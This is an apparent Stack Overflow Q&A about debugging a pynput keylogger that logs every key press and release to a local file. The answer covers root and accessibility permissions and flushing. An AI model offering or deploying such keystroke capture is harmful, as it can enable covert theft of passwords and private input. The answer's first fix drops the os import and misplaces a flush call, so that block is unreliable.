# pynput keylogger does not write to file

Tags: python, python-3.x, keylogger, pynput

I have a problem with this keylogger program. It must write to a file but it doesn't do that. What is wrong?

The program must listen to the keyboard and write it to a file (before, there is a check if the file exists or not). But it doesn't write to the file, it only creates the file.

```
from pynput import keyboard
import os

if os.path.exists("prova3.txt") == True:
    f = open("prova3.txt","a")
else:
    f = open("prova3.txt","x")

def on_press(key):
    try:
        f.writelines("///key [ {0} ] pressed ///".format(
            key.char))
    except AttributeError:
        f.writelines("///special key {0} pressed///".format(
            key))

def on_release(key):
    f.writelines(["///key [ {0} ] released ///".format(
        key)])

with keyboard.Listener(
        on_press=on_press,
        on_release=on_release) as listener:
    listener.join()
```

Answer (score 0, accepted):

First of all, make sure that you took note of the warning from the [pynput docs](https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard):

> Starting a keyboard listener may be subject to some restrictions on your platform.

If you are on a Mac like me, then you have to do this:

> - The process must run as root.
> - Your application must be white listed under *Enable access for assistive devices*.

For that second item, check [these steps](https://stackoverflow.com/a/54659886/2745495) from a related SO post.

Now, for the actual file writing problem, one solution is to call [`f.flush()`](https://docs.python.org/3/library/io.html#io.IOBase.flush) after calling `f.writelines` to ensure that data is *actually* written to the file. (see this related post for some explanation: [what exactly the python's file.flush() is doing?](https://stackoverflow.com/q/7127075/2745495)). I am not familiar with pynput's underlying implementation, but the docs says it uses threads and that seems to affect File I/O. It's also good practice to call [`f.close()`](https://docs.python.org/3/library/io.html#io.IOBase.close) when you're done with the file.

```py
from pynput import keyboard

if os.path.exists("prova3.txt"):
    f = open("prova3.txt", "a")
else:
    f = open("prova3.txt", "x")

def on_press(key):
    try:
        f.writelines("///key [ {0} ] pressed ///".format(
            key.char))
    except AttributeError:
        f.writelines("///special key {0} pressed///".format(
            key))
        f.flush()

def on_release(key):
    f.writelines(["///key [ {0} ] released ///".format(
        key)])
    f.flush()

with keyboard.Listener(
        on_press=on_press,
        on_release=on_release) as listener:
    listener.join()

f.close()
```

An alternative and a better practice is to [use a `with` statement when writing to the file](https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files). That puts `f` and the pynput `listener` all in the same context. With this way, calling `flush` is not needed (but you still can if you want to).

```py
from pynput import keyboard

with open("prova3.txt", "a") as f:
    def on_press(key):
        try:
            f.writelines("///key [ {0} ] pressed ///".format(
                key.char))
        except AttributeError:
            f.writelines("///special key {0} pressed///".format(
                key))

    def on_release(key):
        f.writelines(["///key [ {0} ] released ///".format(
            key)])

    with keyboard.Listener(
            on_press=on_press,
            on_release=on_release) as listener:
        listener.join()
```